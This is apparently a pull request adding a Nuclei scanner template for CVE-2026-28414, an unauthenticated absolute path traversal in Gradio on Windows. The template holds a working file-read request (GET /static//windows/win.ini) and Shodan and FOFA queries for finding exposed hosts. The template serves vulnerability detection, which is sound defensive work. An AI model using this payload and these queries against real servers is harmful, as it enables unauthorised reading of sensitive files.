### PR TITLE
Add CVE-2026-28414 - Gradio - Absolute Path Traversal

### DIFF
--- a/http/cves/2026/CVE-2026-28414.yaml
+++ b/http/cves/2026/CVE-2026-28414.yaml
@@ -1,0 +1,59 @@
+id: CVE-2026-28414
+
+info:
+  name: Gradio - Absolute Path Traversal
+  author: 0x_Akoko
+  severity: high
+  description: |
+   Gradio < 6.7 on Windows with Python 3.13+ contains an absolute path traversal caused by incorrect path validation in path joining logic, letting unauthenticated attackers read arbitrary files from the server.
+  impact: |
+   Unauthenticated attackers can read arbitrary files on the server, potentially exposing sensitive information.
+  remediation: |
+   Upgrade to version 6.7 or later.
+  reference:
+    - https://github.com/gradio-app/gradio/security/advisories/GHSA-39mp-8hj3-5c49
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-28414
+  classification:
+    cve-id: CVE-2026-28414
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-36
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: gradio-app
+    product: gradio
+    shodan-query: 'http.title:"Gradio"'
+    fofa-query: 'title="Gradio" || body="gradio-app"'
+  tags: cve,cve2026,gradio,lfi,traversal,unauth,windows
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: text/html
+
+    matchers:
+      - type: dsl
+        internal: true
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(to_lower(body), "window.gradio_config", "__gradio_mode__")'
+        condition: and
+
+  - raw:
+      - |
+        GET /static//windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(content_type, "text/plain")'
+          - 'contains_all(to_lower(body), "[fonts]", "[extensions]")'
+        condition: and


### PR DESCRIPTION
CVE-2026-28414 details the absolute path traversal vulnerability in Gradio versions prior to 6.7 on Windows, allowing unauthenticated attackers to read arbitrary files. Includes remediation steps and references.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
